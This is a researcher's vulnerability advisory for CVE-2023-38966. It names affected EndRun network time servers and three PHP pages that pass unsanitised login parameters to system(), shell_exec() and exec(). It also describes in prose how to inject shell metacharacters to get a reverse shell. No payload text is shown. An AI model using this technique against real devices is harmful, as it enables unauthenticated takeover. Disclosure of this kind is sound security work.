[EndRun Technologies] - Multiple Unautenticated RCE [ CVE-2023-38966 ]

 

EndRun Technologies is dedicated to the development and refinement of the technologies required to fulfill the demanding needs of the time and frequency community.

--------------------------------------------------------------------------------------------------------------------------

EndRun NTP servers present vulnerabilities that allow an unauthenticated attacker to execute arbitrary OS commands via shell metacharacters in the login_check.php and upgrade_linux.php functions.

Requirements:

- Not authenticated

- HTTPS

- Accessible from the internet

Affected Devices:

•   Tempus LX CDMA Network Time Server
•   Sonoma Network Time Server GPS-Synchronized
•   RTM3205 Precision Timing Module
•   Meridian II 2U Precision TimeBase
•   Unison CDME NEtwork Time Server

Affected Components:

•   login_check.php - Parameters [ user & pass ]
•   upgrade_linux.php - Parameters [ user & pass ]
•   webreboot.php - Parameters [ user & pass ]

login_check.php

The login_check.php resource receives the "user" and "pass" parameters, which does not sanitize and also passes them directly to the system() function in php to execute an "echo" of the variable, which allows by injecting shell metacharacters in addition to the operating system command that you want to execute.

So now we escape with '; and then we place the operating system command that we want to execute

Reverse shell

upgrade_linux.php 

The  upgrade_linux.php  resource receives the "user" and "pass" parameters, which does not sanitize and also passes them directly to the shell_exec() function in php to execute an "echo" of the variable, which allows by injecting shell metacharacters in addition to the operating system command that you want to execute.

So now we escape with '; and then we place the operating system command that we want to execute. in this case, we can inject a reverse shell

webreboot.php 

The webreboot.php  resource receives the "user" and "pass" parameters, which does not sanitize and also passes them directly to the exec() function in php to execute an "echo" of the variable, which allows by injecting shell metacharacters in addition to the operating system command that you want to execute.

So now we escape with '; and then we place the operating system command that we want to execute. in this case, we can inject a reverse shell

By: @linuxmonr4